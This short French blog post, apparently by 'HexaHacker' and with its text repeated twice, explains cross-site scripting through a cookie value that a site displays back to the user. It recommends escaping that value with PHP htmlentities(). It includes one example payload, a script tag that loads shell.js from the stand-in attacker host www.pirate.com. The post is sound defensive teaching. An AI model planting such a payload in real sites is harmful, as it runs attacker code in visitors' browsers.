Tweet
Salutation !
Bon à la vue du titre vous devez surement vous dire ceci :
Le Cookie Site Scripting ?! Mais qu'est ce donc ?
Et bien j'ai découvert cette faille il y a peu de temps.
Bien que cette faille soit peu rependue son exploitation est simple, il s'agit tout bêtement d'un Cross Site Scripting mais via les cookies !
Je m'explique : imaginons qu'un site, par exemple désire stocker sur votre machine (via un cookie) un message qui s'affichera à votre connexion au site ...
Prenons un exemple simple : "Bienvenue [PSEUDO] !"
Vous voyez où je veux en venir ?
Un utilisateur malveillant pourrait réécrire le cookie et y placer un code malveillant : "<script type="text/javascript" src="www.pirate.com/shell.js"></script>"
Et hop le tour est joué le pirate vient d'inclure son shell ou pire encore
!
Donc évitez de stocker n'importe quoi dans vos cookies, ou alors dans ce cas utilisé par exemple la fonction PHP htmlentities() !
HexaHacker
Bon à la vue du titre vous devez surement vous dire ceci :
Le Cookie Site Scripting ?! Mais qu'est ce donc ?
Et bien j'ai découvert cette faille il y a peu de temps.
Bien que cette faille soit peu rependue son exploitation est simple, il s'agit tout bêtement d'un Cross Site Scripting mais via les cookies !
Je m'explique : imaginons qu'un site, par exemple désire stocker sur votre machine (via un cookie) un message qui s'affichera à votre connexion au site ...
Prenons un exemple simple : "Bienvenue [PSEUDO] !"
Vous voyez où je veux en venir ?
Un utilisateur malveillant pourrait réécrire le cookie et y placer un code malveillant : "<script type="text/javascript" src="www.pirate.com/shell.js"></script>"
Et hop le tour est joué le pirate vient d'inclure son shell ou pire encore
!Donc évitez de stocker n'importe quoi dans vos cookies, ou alors dans ce cas utilisé par exemple la fonction PHP htmlentities() !
HexaHacker